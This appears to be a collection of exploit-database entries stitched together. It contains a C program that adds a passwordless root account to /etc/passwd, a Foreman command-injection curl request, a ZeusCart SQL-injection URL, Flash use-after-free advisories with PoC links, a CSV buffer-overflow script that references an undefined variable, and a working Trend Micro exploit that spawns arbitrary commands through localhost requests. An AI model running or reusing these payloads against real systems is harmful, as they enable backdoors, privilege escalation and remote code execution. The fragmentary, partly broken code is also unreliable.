#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

int main(){

setreuid(0,0);

setregid(0,0);

system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");

exit(0);

}

Source: https://code.google.com/p/google-security-research/issues/detail?id=627

The attached swf file causes an out-of-bounds memset in BlurFilter processing. Note that Chrome aborts when processing the swf

Proof of Concept:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39219.zip

source: http://www.securityfocus.com/bid/68117/info

Foreman is prone to a remote command-injection vulnerability.

Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy.

curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'

source: http://www.securityfocus.com/bid/68182/info

ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZeusCart 4.0 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1)

Source: https://code.google.com/p/google-security-research/issues/detail?id=629

The attached file causes a use-after-free when calling the stage setter. The PoC works most consistently in Firefox for 64-bit Windows.

Proof of Concept:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39221.zip

hdr = '"' #start syntax

hcr = "R3Z4" #user

oth = ',"' #user

oth2 = '","",""' #user

crash = "\x41"*199289 #B0F

exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2

file = open("r3z4.csv", "w")

file.write(exp)

file.close()

Source: https://code.google.com/p/google-security-research/issues/detail?id=628

There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.

Proof of Concept:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39220.zip

<title>Trend Micro Maximum Security 10 Exploit</title>

<p>

Sample exploit for Trend Micro Maximum Security 10.

<p>

-- Tavis Ormandy.

<p>

Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">

<p>

<a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).

<p>

<img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">

function begin() {

// The command you want to run, arguments will work but don't use single quotes.

// Lets uninstall Trend Micro.

var cmd = document.getElementById('command').value;

// Start port, Trend Micro trys top open a port starting here until it works.

var port = 49155;

// Wrapper code to start cmd.

var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"

// We can't send quotes, so encode that via character codes.

code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');

// Create the XHR's

for (; port <= 49160; port++) {

var x = new XMLHttpRequest();

x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);

// We can't tell if it worked because of the cross domain policy.

try { x.send(); } catch (e) {};

}

}